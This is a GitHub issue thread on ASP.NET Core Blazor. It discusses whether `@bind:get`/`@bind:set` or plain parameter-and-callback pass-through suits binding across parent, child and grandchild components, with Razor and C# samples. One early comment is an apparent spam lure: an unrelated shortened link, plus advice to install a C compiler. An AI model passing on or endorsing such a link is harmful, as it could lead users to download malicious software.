### ISSUE TITLE
Blazor two-way binding across more than two components (clarification on this documentation)

### ISSUE THREAD

**Issue by adamgf1** [dotnet/aspnetcore#57962]
Hi,

I see the contributing guidelines encourage general feedback and discussions here, so hopefully this is the place for this question.

This is regarding the [Bind across more than two components](https://learn.microsoft.com/en-us/aspnet/core/blazor/components/data-binding?view=aspnetcore-8.0#bind-across-more-than-two-components) example in the documentation.

I've been reading these pages a lot in the past few days, trying to get my head around the details, and there's one thing I'm not clear on:

In the example linked above, where the `NestedChild.razor` component is essentially acting as a pass-through between the `Parent2.razor` and `NestedGrandchild.razor` components, is there a meaningful difference between what the example shows by using `@bind:get`/`@bind:set` modifiers:

```csharp
    <NestedGrandchild @bind-GrandchildMessage:get="ChildMessage" 
        @bind-GrandchildMessage:set="ChildMessageChanged" />
```

And something like this, where I'm passing down the parameter and event callback as "normal":

```csharp
    <NestedGrandchild GrandchildMessage="ChildMessage" 
        GrandchildMessageChanged="ChildMessageChanged" />
```

?

My understanding so far is leading me to believe that the exact way that the example is written, to use the `@bind:get` and `@bind:set` modifiers, is not actually _necessary_ in this case, and it's not necessary because of the way the `NestedChild.razor` component happens to have its parameter/callback matching the type (`string`) of the `NestedGrandchild.razor` component's parameter/callback, and isn't:

- Giving the `NestedGrandchild.razor` component anything different to its own `ChildMessage` parameter value on the way down
- Changing the string given by `NestedGrandchild.razor`'s `GrandchildMessageChanged` event callback on the way up

In other words, I think I can see why the `bind` syntax should be used for example if the `NestedChild.razor` component wanted to transform the string given by the `NestedGrandchild.GrandchildMessageChanged` event callback, before in turn passing it up to the `Parent2.razor` component via the `NestedChild.ChildMessageChanged` event callback.

But in the way that the example is actually written, where no such transformations are going on, I guess my main question is whether there's a reason why the `@bind` syntax _should_ be used in this kind of scenario, as opposed to using the other example snippet I gave where the straight passing-through of the parameter and callback is done from child to grandchild component?

(The reason I ask is that I have this exact situation in the code I'm working on, and the current implementation is using the passing through of parameters and callbacks approach, without `@bind`, and so I'm trying to figure out if I'm missing something important by not having this code follow the way the documentation example is written.)

Hopefully that's a clear enough explanation, thanks in advance for any clarification on this.

**Comment by KERERCVASD** [comment]
maybe this will help
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)

**Comment by guardrex** [comment]
@adamgf1 ... We don't use discussions. Open this as an issue using the **Open a documentation issue** at the bottom of the article, and then I'll ping Mackinnon on the product unit to respond on your new documentation issue.

**Comment by guardrex** [comment]
Apologies, @adamgf1. I was just looking at our doc disscussions when I posted that.

I'll keep an :eye: on this ... one of the Blazor engineers will respond to you shortly here. If we need a docs issue to modify that section, I'll open it after the discussion concludes here.

**Comment by adamgf1** [comment]
Hi @guardrex, not sure what post you're referring to but whatever the case no apology is necessary 😃

Now that you mention doc discussions, I realise this really should have gone into AspNetCore.Docs, shouldn't it. Sorry about that.

**Comment by guardrex** [comment]
I was referring to a comment that I deleted and then replaced ☝️ there.

No problem opening this here, as I'd need to ask them to look at your issue anyway. The content that you're referring to was approved multiple times over the years when it was first provided several years ago and updated a few times since then, but we might end up with new content based on the discussion here. I'm 👂 to see where your question goes.

**Comment by adamgf1** [comment]
Just to throw out an update from my side, so I'm expecting the answer to this is going to be "yes, there's a meaningful difference and it's important to use the `@bind` approach all the way up in a scenario like this".

I say that because I'm experiencing some infinite looping of re-renders in the codebase I referred to earlier, and it seems to be solved by making sure every property and callback involved in the parameter chaining is using the `@bind` approach.

It feels to me like the problem is related to [this discussion](https://github.com/dotnet/AspNetCore.Docs/issues/29855), which remarks that two-way binding doesn't really seem to be something you can have components support optionally. i.e. that if your component is going to support two-way binding, then it _needs_ to be used in that way.

And then in this scenario, of chained parameters, it seems that it is necessary to use two-way binding _all the way up_ your tree of components, at every place where those same two-way bound innermost-child parameters (or the parent versions of those parameters) are being used.

I can be totally wrong about all that though, and talking utter nonsense. I'm definitely beyond the limits of my current understanding of Blazor.

(It probably doesn't help that the code I'm working in that is raising these questions involves a fairly complex layering of things, but unfortunately I'm not in a position to be able to provide a minimal reproduction of the issue I'm talking about at this point in time. If it helps though, we are using the `FluentTreeView` component from the Fluent Blazor package, and essentially at our top-level page we're trying to treat the `Expanded` and `Selected` states of our `FluentTreeItem`s in a one-way binding fashion – but fundamentally the `FluentTreeItem` components and their underlying web components seem to want to be two-way bound only, and so I think this is a big part of where my confusion is coming from.)

**Comment by mkArtakMSFT** [comment]
Thanks for filing this issue. From what I understand, the ask here is to expand the documentation to call out the exact scenarios where the get/set -based syntax would be handy and how exactly it differs from the usual parameter binding and callback registration mechanism.

Basically, with the `@bind-{parameter}:set` you can react to the change before it happens, and yes, change the applied value if necessary before it gets applied. Whereas with the change event registration you get the notification after the change was applied.

Let's keep this issue, and we'll come up with a better sample to use here.

**Comment by guardrex** [comment]
Quick NIT on your example, @adamgf1... I think it will have to be ...

```diff
- <NestedGrandchild GrandchildMessage="ChildMessage" GrandchildMessageChanged="ChildMessageChanged" />
+ <NestedGrandchild GrandchildMessage="@ChildMessage" GrandchildMessageChanged="ChildMessageChanged" />
```

Otherwise, it takes "ChildMessage" as a string literal.

Anyway ... I see what you mean by your question on this subject.

We had a different approach than that for binding across multiple components prior to 7.0. The approach bound to a third property, which triggered the event callback when the extra property was set. It went like this ...

```razor
<NestedGrandchild @bind-GrandchildMessage="BoundValue" />
```

```csharp
[Parameter]
public string? ChildMessage { get; set; }

[Parameter]
public EventCallback<string> ChildMessageChanged { get; set; }

private string BoundValue
{
    get => ChildMessage ?? string.Empty;
    set => ChildMessageChanged.InvokeAsync(value);
}

private async Task ChangeValue()
{
    await ChildMessageChanged.InvokeAsync($"Set in Child {DateTime.Now}");
}
```

Cross-ref: https://learn.microsoft.com/en-us/aspnet/core/blazor/components/data-binding?view=aspnetcore-6.0#bind-across-more-than-two-components

... and then if `GrandchildMessage` is updated (per the button click/method in the `NestedGrandchild` component), `BoundValue` is set and allows a `value` change if you wanted to make one at that point ...

```csharp
private string BoundValue
{
    get => ChildMessage ?? string.Empty;
    set
    {
        value = "Mess'in with the value!";
        ChildMessageChanged.InvokeAsync(value);
    }
}
```

When you wrote ...

> I say that because I'm experiencing some infinite looping of re-renders in the codebase I referred to earlier, and it seems to be solved by making sure every property and callback involved in the parameter chaining is using the @bind approach.

I think your guess is correct on why that code idea you floated was never part of the discusson/docs. The binding design supports the conventions described. The code idea that you supplied falls outside of the design, and thus it can't work reliably. They'll say so for sure later when there's more time for them to look at this.

WRT Artak's explanation, `:get`/`:set` binding in the multiple-level binding scenario wasn't discussed in those terms when the content was generated. It was more along the lines of `:get/:set` modifiers allow you to drop the gymnastics of the extra property. That's my recollection of the discussion a few years ago. That's why the section starts out with remarks about how change notifications flow up the hierarchy and new parameter values flow down the hierarchy. I don't think the example will change, but I certainly think we'll be improving the introduction to the example.

... and we can do something about the sentiment that Artak expressed being absent from the general discussion on `:get`/`:set` modifiers earlier in the article. The way that it was pitched by the PU back when the content went up was more along the lines of one-way/two-way binding in non-component parameter binding cases ...

https://learn.microsoft.com/en-us/aspnet/core/blazor/components/data-binding?view=aspnetcore-9.0#use-bindgetbindset-modifiers-and-avoid-event-handlers-for-two-way-data-binding

I suspect we'll get to this before EOY '24 ***but after the 9.0 release*** 😅. I opened https://github.com/dotnet/AspNetCore.Docs/issues/33994 to work on it.

**Comment by adamgf1** [comment]
Thanks @guardrex, that all makes sense, and the background context of the intent behind originally introducing the various bits of the documentation is helpful.

Regarding our code, in case it helps anyone else who reads this in future, in the end we actually stopped trying to fight the Fluent components in the way that we were trying to (i.e. by using two-way binding and `:get`/`:set` to try to work around the components' mutable state, by trying to intercept and prevent the state changes in the first place), and we ended up implementing our own tree view / tree view item components from scratch.

So with our own implementation, we're still doing the direct passing through of callbacks and parameters through each level of our tree, like the example I described earlier, but there's no two-way binding involved, and it seems to work very well (I think the passing through of parameters and callbacks like that is ok, now that we're not combining it with bindings at all, at least I hope so).

**Comment by javiercn** [comment]
Reading through this, I think one subtle but important distinction here is **what happens when “passing parameters through” also means those parameters are being used as state**.  

If you directly modify a parameter that was passed in from a parent, you’re effectively mutating the parent’s state from the child. In Blazor, this can interfere with the change detection process — because parameters are meant to be *inputs*, not mutable state — and it can trigger an **extra render cycle**. In chained scenarios, this can lead to unintended effects like infinite re-renders.  

### Why `@bind:get/set` helps here
The `@bind:get` / `@bind:set` syntax allows you to:
- Avoid creating an extra “middle” property just to forward values and callbacks.
- Intercept and transform values before they’re applied.
- Keep the parameter immutable in the child, while still supporting two-way binding.

A useful analogy is HTML’s `<input>` element:
- `initialValue` → like the parameter you receive from the parent.
- `value` → like the current state inside the component.

If you mutate `initialValue` directly, you’re breaking the contract. Instead, you keep them separate and update `value` through controlled means.

---

### Example: Passing through without `@bind:get/set`
```razor
<!-- NestedChild.razor -->
<NestedGrandchild 
    GrandchildMessage="@ChildMessage" 
    GrandchildMessageChanged="ChildMessageChanged" />

@code {
    [Parameter] public string? ChildMessage { get; set; }
    [Parameter] public EventCallback<string> ChildMessageChanged { get; set; }
}
```
This works fine **as long as** you never modify `ChildMessage` directly in `NestedChild`.  
If you do:
```csharp
ChildMessage = "New value"; // ❌ This can cause extra renders or loops
```
…you risk interfering with Blazor’s render pipeline.

---

### Example: Using `@bind:get/set` to avoid extra state
```razor
<!-- NestedChild.razor -->
<NestedGrandchild 
    @bind-GrandchildMessage:get="ChildMessage" 
    @bind-GrandchildMessage:set="ChildMessageChanged" />

@code {
    [Parameter] public string? ChildMessage { get; set; }
    [Parameter] public EventCallback<string> ChildMessageChanged { get; set; }
}
```
Here, you don’t need an intermediate property.  
If you *do* want to intercept or transform the value before passing it up:
```razor
@bind-GrandchildMessage:get="ChildMessage"
@bind-GrandchildMessage:set="OnGrandchildMessageChanged"

@code {
    [Parameter] public string? ChildMessage { get; set; }
    [Parameter] public EventCallback<string> ChildMessageChanged { get; set; }

    private Task OnGrandchildMessageChanged(string newValue)
    {
        var transformed = newValue.Trim();
        return ChildMessageChanged.InvokeAsync(transformed);
    }
}
```
This way:
- You never mutate the parameter directly.
- You can still apply logic before the parent sees the change.
- You avoid the “extra property” pattern that was common before `@bind:get/set`.

---

**TL;DR:**  
If you’re just passing parameters through and never mutating them, the plain parameter + callback approach works.  
But the moment you start treating the parameter as state — especially in multi-level binding — `@bind:get/set` is safer, cleaner, and avoids the pitfalls of Blazor’s change detection quirks.

**Comment by javiercn** [comment]
@guardrex I'm going to close this for now, let's file a separate issue if there are any follow ups.

**Comment by adamgf1** [comment]
Thanks for the additional explanation @javiercn. In our case we have no problem based on what you're saying, because we do indeed work with immutable parameter types.

For this though:

> This works fine **as long as** you never modify `ChildMessage` directly in `NestedChild`. If you do:
> 
> ```csharp
> ChildMessage = "New value"; // ❌ This can cause extra renders or loops
> ```
> …you risk interfering with Blazor’s render pipeline.

As far as I can tell, with what's documented about [overwriting parameters](https://learn.microsoft.com/en-us/aspnet/core/blazor/components/overwriting-parameters), if someone's doing that, then they're already really screwing up following Blazor principles and are going to have problems, regardless of whether they're doing it in relation to passing data down layers of components or not.

For this example:

> ### Example: Using `@bind:get/set` to avoid extra state
> ```razor
> 
> <NestedGrandchild 
>     @bind-GrandchildMessage:get="ChildMessage" 
>     @bind-GrandchildMessage:set="ChildMessageChanged" />
> 
> @code {
>     [Parameter] public string? ChildMessage { get; set; }
>     [Parameter] public EventCallback<string> ChildMessageChanged { get; set; }
> }
> ```
> Here, you don’t need an intermediate property. If you _do_ want to intercept or transform the value before passing it up:
> 
> ```razor
> @bind-GrandchildMessage:get="ChildMessage"
> @bind-GrandchildMessage:set="OnGrandchildMessageChanged"
> 
> @code {
>     [Parameter] public string? ChildMessage { get; set; }
>     [Parameter] public EventCallback<string> ChildMessageChanged { get; set; }
> 
>     private Task OnGrandchildMessageChanged(string newValue)
>     {
>         var transformed = newValue.Trim();
>         return ChildMessageChanged.InvokeAsync(transformed);
>     }
> }
> ```
> This way:
> 
> * You never mutate the parameter directly.
> * You can still apply logic before the parent sees the change.
> * You avoid the “extra property” pattern that was common before `@bind:get/set`.

In our case I think we would have something like this for the second code block:

```razor
<!-- NestedChild.razor -->
<NestedGrandchild 
    GrandchildMessage="@ChildMessage" 
    GrandchildMessageChanged="OnGrandchildMessageChanged" />

@code {
    [Parameter] public string? ChildMessage { get; set; }
    [Parameter] public EventCallback<string> ChildMessageChanged { get; set; }

    private Task OnGrandchildMessageChanged(string newValue)
    {
        var transformed = newValue.Trim();
        return ChildMessageChanged.InvokeAsync(transformed);
    }
}
```

I'm sure I'm missing something in what you're saying, for why `@bind:get`/`@bind:set` is beneficial in this scenario, but honestly if I am missing something don't feel any need to keep trying to explain it further if you don't want.

For what we're doing with immutable parameter types, keeping things quite functional, everything seems to be working really well for us. So it would only be if you thought it was going to be beneficial for a wider audience to keep going through more examples.
